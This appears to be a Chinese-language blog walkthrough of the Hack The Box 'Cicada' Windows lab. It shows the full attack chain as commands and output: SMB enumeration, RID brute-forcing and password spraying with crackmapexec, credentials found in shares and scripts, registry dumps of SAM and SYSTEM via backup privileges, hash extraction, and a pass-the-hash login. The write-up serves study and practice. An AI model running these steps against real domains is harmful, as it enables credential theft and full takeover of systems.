HTB-Cicada 靶机笔记

Cicada 靶机笔记

概述

HTB 的靶机 Cicada 靶机

靶机地址:https://app.hackthebox.com/machines/Cicada

很有意思且简单的 windows 靶机,这台靶机多次利用了信息枚举,利用不同的信息一步一步获得 root 权限

一、nmap 扫描

1)端口扫描

-sT tcp 全连接扫描 --min-rate 以最低速率 10000 扫描 -p- 扫描全端口

nmap -sT -p- --min-rate 10000 -o ports 10.10.11.35
Nmap scan report for 10.10.11.35
Host is up (0.39s latency).
Not shown: 65522 filtered tcp ports (no-response)
PORT      STATE SERVICE
53/tcp    open  domain
88/tcp    open  kerberos-sec
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
389/tcp   open  ldap
445/tcp   open  microsoft-ds
464/tcp   open  kpasswd5
593/tcp   open  http-rpc-epmap
636/tcp   open  ldapssl
3268/tcp  open  globalcatLDAP
3269/tcp  open  globalcatLDAPssl
5985/tcp  open  wsman
54435/tcp open  unknown

处理端口

ports=$(grep open ports | awk -F/ '{print $1}' | paste -sd ,)

image-20241031155053584

2)详情探测

-sT tcp 全连接扫描 -sV 探测端口服务版本 -sC 使用默认脚本扫描

nmap -sT -sV -sC -O -p53,88,135,139,389,445,464,593,636,3268,3269,5985,5443
5 -o details 10.10.11.35
Nmap scan report for 10.10.11.35
Host is up (0.35s latency).

PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-09-29 15:06:59Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after:  2025-08-22T20:24:16
|_ssl-date: TLS randomness does not represent time
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after:  2025-08-22T20:24:16
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after:  2025-08-22T20:24:16
|_ssl-date: TLS randomness does not represent time
3269/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after:  2025-08-22T20:24:16
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
54435/tcp open  msrpc         Microsoft Windows RPC
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
OS fingerprint not ideal because: Missing a closed TCP port so results incomplete
No OS matches for host
Service Info: Host: CICADA-DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 6h59m59s
| smb2-security-mode:
|   311:
|_    Message signing enabled and required
| smb2-time:
|   date: 2024-09-29T15:08:00
|_  start_date: N/A

3) 漏洞脚本扫描

nmap --script=vuln -p53,88,135,139,389,445,464,593,636,3268,3269,5985,54435 -o vuln 10.10.11.35
Nmap scan report for 10.10.11.35
Host is up (0.35s latency).

PORT      STATE    SERVICE
53/tcp    open     domain
88/tcp    open     kerberos-sec
135/tcp   open     msrpc
139/tcp   open     netbios-ssn
389/tcp   open     ldap
445/tcp   open     microsoft-ds
464/tcp   open     kpasswd5
593/tcp   open     http-rpc-epmap
636/tcp   open     ldapssl
|_ssl-ccs-injection: No reply from server (TIMEOUT)
3268/tcp  open     globalcatLDAP
3269/tcp  open     globalcatLDAPssl
|_ssl-ccs-injection: No reply from server (TIMEOUT)
5985/tcp  open     wsman
54435/tcp filtered unknown

Host script results:
|_samba-vuln-cve-2012-1182: Could not negotiate a connection:SMB: Failed to receive bytes: ERROR
|_smb-vuln-ms10-061: Could not negotiate a connection:SMB: Failed to receive bytes: ERROR
|_smb-vuln-ms10-054: false

二、smb 枚举

1)smbclient

看到目标开放了 445 端口的 smb 服务,先对它进行匿名访问

smbclient -L 10.10.11.35
Password for [WORKGROUP\kali]:

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        DEV             Disk      
        HR              Disk      
        IPC$            IPC       Remote IPC
        NETLOGON        Disk      Logon server share 
        SYSVOL          Disk      Logon server share 
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.11.35 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available

空密码,看到有共享信息暴露给我们。

只有 HR 磁盘有访问权限,进去看看有没有感兴趣的信息

smbclient  '\\10.10.11.35\HR'
Password for [WORKGROUP\kali]:
Try "help" to get a list of possible commands.

smb: \> dir
  .                                   D        0  Thu Mar 14 20:29:09 2024
  ..                                  D        0  Thu Mar 14 20:21:29 2024
  Notice from HR.txt                  A     1266  Thu Aug 29 01:31:48 2024

                4168447 blocks of size 4096. 424297 blocks available

smb: \> get "Notice from HR.txt"
getting file \Notice from HR.txt of size 1266 as Notice from HR.txt (0.8 KiloBytes/sec) (average 0.8 KiloBytes/sec)
smb: \> 

看到一个名为 Notice from HR.txt 的文件

查看内容

cat Notice\ from\ HR.txt 
Dear new hire!

Welcome to Cicada Corp! We're thrilled to have you join our team. As part of our security protocols, it's essential that you change your default password to something unique and secure.

Your default password is: Cicada$M6Corpb*@Lp#nZp!8

To change your password:

1. Log in to your Cicada Corp account** using the provided username and the default password mentioned above.
2. Once logged in, navigate to your account settings or profile settings section.
3. Look for the option to change your password. This will be labeled as "Change Password".
4. Follow the prompts to create a new password**. Make sure your new password is strong, containing a mix of uppercase letters, lowercase letters, numbers, and special characters.
5. After changing your password, make sure to save your changes.

Remember, your password is a crucial aspect of keeping your account secure. Please do not share your password with anyone, and ensure you use a complex password.

If you encounter any issues or need assistance with changing your password, don't hesitate to reach out to our support team at support@cicada.htb.

Thank you for your attention to this matter, and once again, welcome to the Cicada Corp team!

Best regards,
Cicada Corp

看上去是一封邮件,里面我们后的了一组密码凭证Cicada$M6Corpb*@Lp#nZp!8

不知道用户名,我们用crackmapexec枚举机器的用户名

2)crackmapexec

a)枚举用户名

crackmapexec smb 10.10.11.35 -u 'dsad' -p '' --rid-brute
SMB         10.10.11.35     445    CICADA-DC        [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.35     445    CICADA-DC        [+] cicada.htb\dsad:
SMB         10.10.11.35     445    CICADA-DC        [+] Brute forcing RIDs
SMB         10.10.11.35     445    CICADA-DC        498: CICADA\Enterprise Read-only Domain Controllers (SidTypeGroup)
SMB         10.10.11.35     445    CICADA-DC        500: CICADA\Administrator (SidTypeUser)
SMB         10.10.11.35     445    CICADA-DC        501: CICADA\Guest (SidTypeUser)
SMB         10.10.11.35     445    CICADA-DC        502: CICADA\krbtgt (SidTypeUser)
SMB         10.10.11.35     445    CICADA-DC        512: CICADA\Domain Admins (SidTypeGroup)
SMB         10.10.11.35     445    CICADA-DC        513: CICADA\Domain Users (SidTypeGroup)
SMB         10.10.11.35     445    CICADA-DC        514: CICADA\Domain Guests (SidTypeGroup)
SMB         10.10.11.35     445    CICADA-DC        515: CICADA\Domain Computers (SidTypeGroup)
SMB         10.10.11.35     445    CICADA-DC        516: CICADA\Domain Controllers (SidTypeGroup)
SMB         10.10.11.35     445    CICADA-DC        517: CICADA\Cert Publishers (SidTypeAlias)
SMB         10.10.11.35     445    CICADA-DC        518: CICADA\Schema Admins (SidTypeGroup)
SMB         10.10.11.35     445    CICADA-DC        519: CICADA\Enterprise Admins (SidTypeGroup)
SMB         10.10.11.35     445    CICADA-DC        520: CICADA\Group Policy Creator Owners (SidTypeGroup)
SMB         10.10.11.35     445    CICADA-DC        521: CICADA\Read-only Domain Controllers (SidTypeGroup)
SMB         10.10.11.35     445    CICADA-DC        522: CICADA\Cloneable Domain Controllers (SidTypeGroup)
SMB         10.10.11.35     445    CICADA-DC        525: CICADA\Protected Users (SidTypeGroup)
SMB         10.10.11.35     445    CICADA-DC        526: CICADA\Key Admins (SidTypeGroup)
SMB         10.10.11.35     445    CICADA-DC        527: CICADA\Enterprise Key Admins (SidTypeGroup)
SMB         10.10.11.35     445    CICADA-DC        553: CICADA\RAS and IAS Servers (SidTypeAlias)
SMB         10.10.11.35     445    CICADA-DC        571: CICADA\Allowed RODC Password Replication Group (SidTypeAlias)
SMB         10.10.11.35     445    CICADA-DC        572: CICADA\Denied RODC Password Replication Group (SidTypeAlias)
SMB         10.10.11.35     445    CICADA-DC        1000: CICADA\CICADA-DC$ (SidTypeUser)
SMB         10.10.11.35     445    CICADA-DC        1101: CICADA\DnsAdmins (SidTypeAlias)
SMB         10.10.11.35     445    CICADA-DC        1102: CICADA\DnsUpdateProxy (SidTypeGroup)
SMB         10.10.11.35     445    CICADA-DC        1103: CICADA\Groups (SidTypeGroup)
SMB         10.10.11.35     445    CICADA-DC        1104: CICADA\john.smoulder (SidTypeUser)
SMB         10.10.11.35     445    CICADA-DC        1105: CICADA\sarah.dantelia (SidTypeUser)
SMB         10.10.11.35     445    CICADA-DC        1106: CICADA\michael.wrightson (SidTypeUser)
SMB         10.10.11.35     445    CICADA-DC        1108: CICADA\david.orelious (SidTypeUser)
SMB         10.10.11.35     445    CICADA-DC        1109: CICADA\Dev Support (SidTypeGroup)
SMB         10.10.11.35     445    CICADA-DC        1601: CICADA\emily.oscars (SidTypeUser)

从结果中过滤出SidTypeUser的信息来,就是机器的用户

Administrator
Guest
krbtgt
Domain
Protected
CICADA-DC$
john.smoulder
sarah.dantelia
michael.wrightson
david.orelious
emily.oscars

b)爆破凭证

把用户放到user文件中,把密码放到pass文件中

crackmapexec smb 10.10.11.35  -u user -p pass --continue-on-success

image-20241031160845584

看到正确的smb凭证信息michael.wrightson:Cicada$M6Corpb*@Lp#nZp!8

看看它的共享权限

crackmapexec smb 10.10.11.35  -u michael.wrightson -p pass --shares

image-20241031161320059

可以看到一个新的共享文件DEV,但这个账户并没有READ权限

同时这个账户也不支持winrm远程管理

image-20241031161135602

c)进一步枚举

利用已知的账户,枚举其他账户信息

crackmapexec smb 10.10.11.35  -u michael.wrightson -p pass --users

image-20241031161629043

发现了另一组凭证信息david.orelious:aRt$Lp#7t*VQ!3

看以他的smb权限

crackmapexec smb 10.10.11.35  -u david.orelious -p 'aRt$Lp#7t*VQ!3' --shares

image-20241031161851479

看到这个用户对DEV文件有读权限

用smbclient把它下载下来

smbclient  '\\10.10.11.35\DEV' -U david.orelious   
Password for [WORKGROUP\david.orelious]:
Try "help" to get a list of possible commands.
smb: \> dir
  .                                   D        0  Thu Mar 14 20:31:39 2024
  ..                                  D        0  Thu Mar 14 20:21:29 2024
  Backup_script.ps1                   A      601  Thu Aug 29 01:28:22 2024

                4168447 blocks of size 4096. 423385 blocks available
smb: \> get Backup_script.ps1
getting file \Backup_script.ps1 of size 601 as Backup_script.ps1 (0.4 KiloBytes/sec) (average 0.4 KiloBytes/sec)
smb: \> 

看到Backup_script.ps1,下载下来

cat Backup_script.ps1
$username = "emily.oscars"
$password = ConvertTo-SecureString "Q!3@Lp#M6b*7t*Vt" -AsPlainText -Force
$credentials = New-Object System.Management.Automation.PSCredential($username, $password)
$dateStamp = Get-Date -Format "yyyyMMdd_HHmmss"
$backupFileName = "smb_backup_$dateStamp.zip"
$backupFilePath = Join-Path -Path $destinationDirectory -ChildPath $backupFileName
Compress-Archive -Path $sourceDirectory -DestinationPath $backupFilePath
Write-Host "Backup completed successfully. Backup file saved to: $backupFilePath"

有发现了一组凭证emily.oscars:Q!3@Lp#M6b*7t*Vt

验证winrm权限

crackmapexec winrm 10.10.11.35  -u emily.oscars -p 'Q!3@Lp#M6b*7t*Vt'

image-20241031162553666

看到是Pwn3d! 的状态,说明可以登录

三)获得立足点

1)evil-winrm

evil-winrm -i 10.10.11.35  -u emily.oscars -p 'Q!3@Lp#M6b*7t*Vt'

image-20241031162911104

拿到user flag

四)提权

看看当前用户权限

whoami /priv
PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== =======
SeBackupPrivilege             Back up files and directories  Enabled
SeRestorePrivilege            Restore files and directories  Enabled
SeShutdownPrivilege           Shut down the system           Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled

看到当前用户有SeBackupPrivilegeSeRestorePrivilege权限,我们可以把sam,system转储出来,破解administrator的hash值,接着利用PTH进行哈希传递攻击,从而获取administrator权限

在c盘下创建一个temp目录

执行

reg save hklm\sam c:\temp\san
reg save hklm\system c:\temp\system

image-20241031163828705

看到转出出来的sam和system

downlaod sam
download system

将文件下载到本地

image-20241031164136779

破解sam

impacket-secretsdump -sam sam -system system local

image-20241031164216197

看到administrator的ntlmhash值2b87e7c93a3e8a0ea4a581937016f341

进行hash传递也就是PTH攻击

evil-winrm -i 10.10.11.35  -u administrator -H 2b87e7c93a3e8a0ea4a581937016f341

image-20241031164517084

成功拿到root权限

总结

通过nmap扫描发现目标开放了445 smb服务,对smb进行信息的枚举,发现了一个用户密码,进入获得了一组可以用来进行winrm远程管理的凭证,登陆进去发现用具有SeBackupPrivilege的权限,利用该权限转储hash值,进行PTH攻击,获得了管理员权限

posted @ 2024-10-31 16:50  Ling-X5  阅读(68)  评论(0编辑  收藏  举报